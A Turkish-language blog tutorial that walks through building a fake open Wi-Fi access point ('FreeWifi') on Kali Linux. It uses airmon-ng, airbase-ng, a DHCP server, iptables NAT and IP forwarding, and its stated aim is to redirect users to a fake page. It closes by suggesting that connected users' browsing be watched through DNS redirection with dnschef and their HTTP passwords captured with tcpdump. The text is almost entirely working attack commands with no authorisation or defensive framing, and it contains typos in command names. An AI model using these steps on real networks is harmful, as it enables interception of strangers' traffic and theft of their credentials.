Sahte Kablosuz ağı oluşturmak.

Bu yazımızda Kali linux’da sahte kablosuz ağ nasıl oluşturulur ve sahte ağ bağlanan kullanıcılar nasıl sahte sayfaya yönlendirilir. anlatmaya çalışacağım.
öncelikle bir wireless kartına ihtiyacımız olacak burayı tıklayarak ulaşabilirsiniz.
birde bu sahte sayfa yönlendirmesi için bir önceki yazıya bakmamız gerek onuda buradan bakalım.

kali linux’a ilgili adaptör bağlantısını yaptıktan arabirimler listelenir. wlan14 bizim ağ adaptörümüz.

root@kali:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:d4:00:39  
          inet addr:192.168.101.52  Bcast:192.168.101.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fed4:39/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:157803 errors:0 dropped:0 overruns:0 frame:0
          TX packets:132762 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:99224767 (94.6 MiB)  TX bytes:24051639 (22.9 MiB)
          Interrupt:19 Base address:0x2000 

wlan14    Link encap:Ethernet  HWaddr 64:66:b3:28:94:21  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

artık dinleme yapmasını veya sahte erişim noktası yapabilmek için ağı adaptörümüzu kullanabiliriz.
airmon-ng aracıyla sanal bir interface oluşturup ilgili bağlantıyı başatalım.

root@kali:~# airmon-ng start wlan14


Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID	Name
2562	NetworkManager
2758	wpa_supplicant
2759	dhclient
Process with PID 5001 (airbase-ng) is running on interface mon0


Interface	Chipset		Driver

wlan14		Atheros AR9271	ath9k - [phy2]
				(monitor mode enabled on mon1)
mon0		Atheros AR9271	ath9k - [phy2]

mon1 adında yeni sanal arabirim oluşturuldu. testi için çalıştıralım etrafımızdaki kablosuz ağları görebiliyormuyuz testini yapalım.

root@kali:~# airodum-ng mon1

eğer aşağıdaki gibi bir hata aldıysanız.aşağıdaki adımı uygulayın.
ioctl(SIOCSIFFLAGS) failed: Unknown error 132

 root@kali:~# modprobe r8187se

tekrardan kontrol edelim çalışıyor mu diye

 root@kali:~# airodum-ng mon1

sahte kablosuz ağımıza bağlanacak kullanıcılara ip dağıtmak için kali linux’a dhcp server servisi kuralım.

 root@kali:~# apt-get install dhcp3-server

yükleyemediniz veya deponuzda bir sorun olduysa elle yükleyelim bunun için.ilgili dosyayı buradan indirelim.

 root@kali:~# tar -xvf isc-dhcp-server.tar.gz -C /test

ilgili .dep paketini sistemize yükledikten kaliyi sonra yeniden başlatalım.

 root@kali:~# dpkg -i isc.dhcp.server.dep
reboot

ip aralığı verebilmek için dhcp servisinin conf dosyasını aşağıdaki gibi düzenleyelim.

nano /etc/dhcp3/dhcpd.conf

ddns-update-style ad-hoc; //bu alanı daha sonradan servis çalışmassa hata verirse kaldıracağız.
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}

airbase-ng ile sahte kablosuz ağı oluşturulaım.

airbase-ng -e FreeWifi -c 11 -v wlan1 &

at0 adında sanal arabirim ekleyelim

ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0

route yazalım

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

iptable ayarlarını yazalım

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT 

gelecek bağlantıları yönlendirelim.

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

dhcp servisini başlatalım.

dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &

gelecek ipleri yönlendirelim

echo "1" > /proc/sys/net/ipv4/ip_forward

ilgili adımlardan sonra testlerini gerçekleştirelim. ip aldığınızda artık eth0 üzerinden internete çıkabiliyorsunuz yani örneğin bir kullanıcının ip alıp internette hangi sayfalara gittiğini dnschef ile dns yönlendirmesi yaparak bakabilir yada tcpdump ile http trafiğinde parola bilgilerini alabiliriz.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

*